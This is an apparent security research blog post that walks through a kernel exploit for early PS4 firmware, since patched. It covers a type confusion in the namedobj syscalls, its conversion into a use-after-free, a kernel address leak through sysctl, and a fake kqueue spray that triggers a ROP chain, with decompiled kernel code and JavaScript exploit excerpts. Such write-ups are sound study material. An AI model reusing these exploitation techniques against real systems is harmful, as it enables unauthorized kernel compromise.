The First PS4 Kernel Exploit: Adieu

Plenty of time has passed since we first demonstrated Linux running on the PS4.

Now we will step back a bit and explain how we managed to jump from the browser process into the kernel such that ps4-kexec et al. are usable.

Over time, ps4 firmware revisions have progressively added many mitigations and in general tried to lock down the system. This post will mainly touch on vulnerabilities and issues which are not present on the latest releases, but should still be useful for people wanting to investigate ps4 security.

Vulnerability Discovery

As previously explained, we were able to get a dump of the ps4 firmware 1.01 kernel via a PCIe man-in-the-middle attack. Like all FreeBSD kernels, this image included “export symbols” - symbols which are required to perform kernel and module initialization processes. However, the ps4 1.01 kernel also included full ELF symbols (obviously an oversight as they have been removed in later firmware versions). This oversight was beneficial to the reverse engineering process, although of course not a true prerequisite. Indeed, we began exploring the kernel by examining built-in metadata in the form of the syscall handler table - focusing on the ps4-specific entries.

After some recovering of structures, we discovered that a large portion of the ps4-specific syscalls are little more than wrappers to what is essentially a hash table API. The API exposes the following interface:

enum IDT_TYPE : u16 {
    IDT_TYPE_EPORT        = 0x0030,
    IDT_TYPE_SBLOCK       = 0x0040,
    IDT_TYPE_EVF          = 0x0110,
    IDT_TYPE_OSEM         = 0x0120,
    IDT_TYPE_BUDGET       = 0x2000,
    IDT_TYPE_NAMEDOBJ_DBG = 0x5000,
};
struct id_entry {
    struct sx *sxlock;
    char *name;
    void *ptr;
    u64 tid;
    IDT_TYPE kind;
    u16 is_open;
    u16 handle;
    u16 state;
};
struct idt_bucket {
    struct id_entry entries[128];
};
struct id_table {
    struct idt_bucket buckets[64];
    struct mtx mutex;
    u32 num_buckets;
    u32 cur_handle;
    u32 max_entries;
};
id_table *id_table_create(int max_entries);
void id_table_destroy(id_table *idt);
int id_alloc(id_table *idt, id_entry **ide);
void id_set(id_entry *ide, IDT_TYPE kind, void *data, char *name);
void id_set_open(id_entry *ide, IDT_TYPE kind, void *data, char *name);
int id_is_opened(id_entry *ide);
void id_free(id_table *idt, int handle, id_entry *ide);
void id_unlock(id_entry *ide);
void *id_rlock(id_table *idt, signed int index, IDT_TYPE kind, id_entry **ide);
void *id_rlock_name(id_table *idt, IDT_TYPE kind, char *name, id_entry **ide);
void *id_wlock(id_table *idt, signed int index, IDT_TYPE kind, id_entry **ide);

Each process object in the kernel contains its own “idt” (ID Table) object. As can be inferred from the snippet above, the hash table essentially just stores pointers to opaque data blobs, along with a given kind and name. Entries may be accessed (and thus “locked”) with either read or write intent.

Note that IDT_TYPE is not a bitfield consisting of only unique powers of 2. This means that if we can control the kind of an id_entry, we may be able to cause a type confusion to occur (it is assumed that we may control name). Sure enough, kind may be set from usermode via the namedobj_create syscall:

struct namedobj_usr_t {
    char *name;
    void *object;
    u64 field_10;
};
int sys_namedobj_create(struct thread *td, void *args) {
  MACRO_EPERM rv; // ebx
  int kind; // er14
  id_table *idt; // r12
  char *name; // r13
  namedobj_usr_t *no; // rbx
  int handle; // er15
  id_entry *ide; // [rsp+8h] [rbp-38h]
  __int64 v10; // [rsp+10h] [rbp-30h]

  rv = EINVAL;
  if ( *(_QWORD *)args ) {
    // Note this is almost completely usermode-controlled!
    kind = *((_DWORD *)args + 4) | 0x1000;
    idt = td->td_proc->sce_idt;
    name = (char *)malloc(0x20uLL, &M_NAME, 2);
    rv = copyinstr(*(const void **)args, name, 0x20uLL, 0LL);
    if ( rv ) {
      free(name, &M_NAME);
    } else {
      no = (namedobj_usr_t *)malloc(0x18uLL, &M_NAME, 2);
      no->name = name;
      no->object = *((_QWORD *)args + 1);
      handle = id_alloc(idt, &ide);
      if ( handle == -1 ) {
        free(name, &M_NAME);
        free(no, &M_NAME);
        rv = EAGAIN;
      } else {
        id_set(ide, (IDT_TYPE)kind, no, name);
        id_unlock(ide);
        td->td_retval[0] = handle;
        rv = 0;
      }
    }
  }
  return rv;
}

Now we need to find a way to have the kernel access and improperly use an object from our process’ (i.e. the browser process) idt which has a kind of 0x1000 plus any other number of bits set. This was found in the following code:

struct namedobj_dbg_t {
    u32 field_0;
    u32 _pad_4; // compiler-inserted alignment
    u64 field_8;
    u64 field_10;
    u64 field_18;
    u64 field_20;
};
int namedobj_create_ex(id_table *idt, char *name, u32 a3, u64 a4, u64 a5,
                       u64 a6, u64 a7) {
  namedobj_dbg_t *no_exists; // rax
  int rv; // er13
  id_entry *ide_existing; // [rsp+20h] [rbp-40h]

  rv = EAGAIN;
  no_exists = (namedobj_dbg_t *)id_rlock_name(idt, IDT_TYPE_NAMEDOBJ_DBG, name,
                                              &ide_existing);
  if ( no_exists )
  {
    no_exists->field_0 = a3;
    no_exists->field_8 = a4;
    no_exists->field_10 = a5;
    no_exists->field_18 = a6;
    no_exists->field_20 = a7;
    id_unlock(ide_existing);
    rv = 0;
  }
  // ... unrelated code removed
  return rv;
}

…which is accessible from the mdbg_service syscall:

struct mdbg_service_arg1 {
    u32 field_0;
    u64 field_4;
    u64 field_8;
    u64 field_10;
    u64 field_18;
    u64 field_20;
    char name[32];
};
int sys_mdbg_service(struct thread *td, void *args) {
  signed int rv; // ebx
  void *uptr; // r14
  mdbg_service_arg1 cmd_1; // [rsp+18h] [rbp-68h]

  rv = 78;
  uptr = (void *)*((_QWORD *)args + 1);
  switch ( (unsigned __int64)*(unsigned int *)args ) {
    // ... unrelated code removed
    case 1uLL:
      rv = copyin(uptr, &cmd_1, 0x48uLL);
      if ( rv )
        break;
      cmd_1.name[31] = 0;
      rv = namedobj_create_ex(
             td->td_proc->sce_idt,
             cmd_1.name,
             cmd_1.field_4,
             cmd_1.field_8,
             cmd_1.field_10,
             cmd_1.field_18,
             cmd_1.field_20);
      break;
      // ... unrelated code removed
  }
  return rv;
}

Using the combination of these syscalls, we can induce a type confusion. First, calling namedobj_create(name = "haxplz", kind = 0x1000 | 0x4000, ...) will cause the kernel to set a pointer of type namedobj_usr_t into the idt. Then, calling namedobj_create_ex(name = "haxplz", ...) will cause the kernel to access the same pointer, but cast it to type namedobj_dbg_t!

Exploitation

To an exploiter without ps4 background, it might seem that the easiest way to exploit this bug would be to take advantage of the write off the end of the malloc’d namedobj_usr_t object. However, this turns out to be impossible (as far as I know) because of a side effect of the ps4 page size being changed to 0x4000 bytes (from the normal of 0x1000). It appears that in order to change the page size globally, the ps4 kernel developers opted to directly change the related macros. One of the many changes resulting from this is that the smallest actual amount of memory which malloc may give back to a caller becomes 0x40 bytes. While this also results in tons of memory being completely wasted, it does serve to nullify certain exploitation techniques (likely completely by accident…).

UAF Crafting

The way chosen to exploit this type confusion was actually to convert it into a use-after-free scenario. This was done with the help of the namedobj_delete syscall:

int sys_namedobj_delete(struct thread *td, void *args) {
  struct proc *p; // rax
  id_table *idt; // r15
  namedobj_usr_t *no; // r14
  int rv; // eax
  id_entry *id_out; // [rsp+8h] [rbp-28h]

  p = td->td_proc;
  idt = p->sce_idt;
  no = (namedobj_usr_t *)id_wlock(
                           p->sce_idt,
                           *(_DWORD *)args,
                           (IDT_TYPE)(*((_WORD *)args + 4) & ~0x1000 | 0x1000),
                           &id_out);
  rv = ESRCH;
  if ( no )
  {
    id_free(idt, *(_DWORD *)args, id_out);
    id_unlock(id_out);
    free(no->name, &M_NAME);
    free(no, &M_NAME);
    rv = 0;
  }
  return rv;
}

Note that the type confusion allows us to cast a namedobj_usr_t object to a namedobj_dbg_t one, and then update all of the namedobj_dbg_t fields. Not only does this allow us to write off the end of the actual namedobj_usr_t object, it also allows writing to the lower 32bits of the namedobj_usr_t.name pointer, as well all the other namedobj_usr_t fields. The fact that we may only update the lower 32bits of namedobj_usr_t.name is actually a blessing in disguise (although it doesn’t matter so much for this post).

So, the use-after-free primitive we have allows us to free() any kernel address which happens to share the top 32bits with no->name. This means we can have our choice of any malloc’d pointer to free - we just need to somehow find such a pointer :) Obviously, such a pointer should be able to be used in a nice way after we free it and reallocate the backing memory.

Finding a UAF Target

Since this was my first time working with FreeBSD, I just looked for some kernel object containing some function pointers which I could somehow derive the address of from the browser process. It turns out that on firmware 1.01 this is incredibly easy:

sysctlbyname("kern.file", ...)

will happily give you various kernel addresses relating to the file objects which the kernel uses to manage userspace file descriptors. From the exploit code:

constructor.prototype.getFileDescriptorKernelDataPtr = function(fd) {
    var fd_xf_data = 0;
    sys.getSysCtlByName('kern.file', function(oldp, oldlen) {
        var pid = sys.getCurrentProcessId();
        var file_size = read64(oldp).lo;
        var num_files = oldlen / file_size;
        for (var i = 0; i < num_files; i++) {
            var xf_pid = read32(oldp.plus(i * file_size + 0x08));
            var xf_fd = read32(oldp.plus(i * file_size + 0x10));
            var xf_data = read64(oldp.plus(i * file_size + 0x38));
            if (xf_pid == pid && xf_fd == fd) {
                fd_xf_data = xf_data;
                return;
            }
        }
    });
    return fd_xf_data;
}
et voilà! A kernel file.f_data value (for a fd you control) in javascript. The type of the object pointed to by file.f_data depends on what type of file descriptor it is. I used kqueue as this met my goal of a target object containing function pointers. The idea will be to overwrite a kqueue and then cause one of the function pointers within kq->kq_knlist->kn_knlist to be executed, which will point to a rop chain. Note kq_knlist and kn_knlist are lists (as their names state), not standard pointers.

Putting it Together

Another exploit excerpt:

// finalize the ropchain and invoke it
constructor.prototype.trigger_kqueue = function() {
    var fakefd = callFunc(syms.libkernel.kqueue).lo;
    var filep = this.leaks.getFileDescriptorKernelDataPtr(fakefd);

    var rop_scratch_len = 0;
    var data_buf_len = this.kqueue_sizeof + this.klist_sizeof + this.knote_sizeof +
        this.filterops_sizeof + this.knlist_sizeof + this.jmpbuf_sizeof +
        rop_scratch_len;
    var data_buf = allocateGCMemory(data_buf_len);
    clearMemory(data_buf, data_buf_len);

    var fakekq      = data_buf;
    var kl          = fakekq.plus(this.kqueue_sizeof);
    var kn          = kl.plus(this.klist_sizeof);
    var fop         = kn.plus(this.knote_sizeof);
    var knl         = fop.plus(this.filterops_sizeof);
    var jmpbuf      = knl.plus(this.knlist_sizeof);
    var rop_scratch = jmpbuf.plus(this.jmpbuf_sizeof);

    // finalize ropchain
    this.emitReturnViaJmpbuf(jmpbuf);

    // create fake kq to execute the ropchain
    var rop_stack = this.rop.getRopStack();
    write64(jmpbuf.plus(0x48), rop_scratch);   // rdi
    write64(jmpbuf.plus(0x60), 0);             // rcx (why?)
    write64(jmpbuf.plus(0xe0), gadgets.ret);   // next rip
    write64(jmpbuf.plus(0xf8), rop_stack);     // rsp

    // longjmp_tail needs at least 1 stack slot to push next rip onto
    write64(knl.plus(0x08), gadgets.ret);           // kl_lock
    write64(knl.plus(0x10), gadgets.longjmp_tail);  // kl_unlock
    write64(knl.plus(0x18), gadgets.ret);           // kl_assert_locked
    write64(knl.plus(0x20), gadgets.ret);           // kl_assert_unlocked
    write64(knl.plus(0x28), jmpbuf);                // kl_lockarg (passed as
                                                    // rdi to the above funcptrs)

    write32(fop, 1);                        // f_isfd = 1
    write64(fop.plus(0x18), gadgets.ret0);  // f_event = {ret 0}

    write64(kn.plus(0x10), knl);                // kn_knlist
    write32(kn.plus(0x38), this.EVFILT_READ);   // kn_filter = EVFILT_READ (16bit)
    write32(kn.plus(0x50), 2);                  // kn_status = KN_QUEUED
    write64(kn.plus(0x68), fop);                // kn_fop

    write64(kl, kn); // slh_first = &kn

    this.writeFakeMtx(fakekq.plus(0));  // kq_lock
    write32(fakekq.plus(0xa4), 1);      // kq_knlistsize = 1
    write64(fakekq.plus(0xa8), kl);     // kq_knlist = &kl

    var change = allocateGCMemory(this.kevent_sizeof);
    clearMemory(change, this.kevent_sizeof);
    write32(change.plus(8), this.EVFILT_READ);

    // free, try to fill the buffer, then cause it to be used
    this.kernelFree(filep);
    this.ioctlSpray(fakekq, this.kqueue_sizeof);
    callFunc(syms.libkernel.kevent, fakefd, change, 1, 0, 0, 0);

    // safe as long as injected code has fixed the corrupted kqueue
    callFunc(syms.libkernel.close, fakefd);
}

Above is shown the creation of a kqueue object in userspace, which then gets sprayed into the kernel after performing our UAF primitive (via kernelFree()) simply by calling ioctl() with it. After the spray, executing the syscall kevent() with the fd relating to our corrupted file object will cause the kernel to call the kqueue object’s kl_unlock function pointer, which will kick off execution of the ROP chain.

Cleaning Up

Since this exploit leaves a corrupted file object in the browser’s file descriptor table, the first thing for the kernel payload to do is actually to remove that corruption. Otherwise, the kernel will eventually panic (normally while iterating the process’ file descriptor table in an attempt to close() all of them). This can easily be done with the following:

void fix_corrupted_kqueue(struct thread *td) {
    // This method prevents the kernel from crashing (most of the time), but
    // the process will sigsegv when exiting.
    // blog note:
    //   I actually no longer remember if the above comment is true.
    //   I always kexec directly to linux so it doesn't matter to me :)
    struct filedesc *fdp = td->td_proc->p_fd;
    for (int fd = 0; fd < fdp->fd_nfiles; fd++) {
        struct file *fp = fdp->fd_ofiles[fd];
        if (fp && fp->f_type == DTYPE_KQUEUE) {
            struct kqueue *kq = fp->f_data;
            if ((uintptr_t)kq->kq_knlist < VM_USER_MAX) {
                // found the bad one...kill it
                SLIST_REMOVE(&fdp->fd_kqlist, kq, kqueue, kq_list);
                fdp->fd_ofiles[fd] = NULL;
                fdp->fd_ofileflags[fd] = 0;
                return;
            }
        }
    }
}
...
fix_corrupted_kqueue(curthread());

Adieu

The namedobj exploit was present and exploitable (albeit using a slightly different method than described here) until it was fixed in firmware version 4.06. This vulnerability was also found and exploited by (at least) Chaitin Tech, so props to them! Taking a quick look at the 4.07 kernel, we can see a straightforward fix (4.06 is assumed to be identical - only had 4.07 on hand while writing this post):

int sys_namedobj_create(struct thread *td, void *args) {
  // ...
  rv = EINVAL;
  kind = *((_DWORD *)args + 4)
  if ( !(kind & 0x4000) && *(_QWORD *)args ) {
    // ... (unchanged)
  }
  return rv;
}

And so we say goodbye to a nice exploit.

I hope you enjoyed this blast from the past :)
Keep hacking!